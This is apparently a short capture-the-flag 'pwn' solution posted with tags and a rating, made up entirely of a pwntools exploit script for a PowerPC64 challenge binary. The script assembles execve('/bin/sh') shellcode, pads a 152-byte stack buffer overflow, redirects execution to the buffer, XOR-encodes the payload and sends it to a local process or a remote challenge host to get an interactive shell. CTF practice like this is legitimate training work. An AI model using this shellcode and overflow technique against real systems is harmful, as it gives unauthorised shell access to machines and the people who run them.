Tags: ppc pwn
Rating: 1.0
```
from pwn import *
context.arch='ppc64'
context.endian='little'
LOCAL = len(sys.argv) == 1
sc = asm(
'''
_shellcode:
xor r5, r5, r5
bnel _shellcode
mflr r3
li r0, 11
addi r3, r3, 20
li r4, 0
sc
_binsh:
.asciz "/bin/sh"
'''
)
elf = ELF('./ppc')
if LOCAL:
s = process('./ppc')
else:
s = remote('stack.overflow.fail', 9001)
p = flat(
sc,
'A' * (152-len(sc)),
elf.symbols['buf']
)
s.sendline(xor(p, 0xcb))
s.interactive()
```
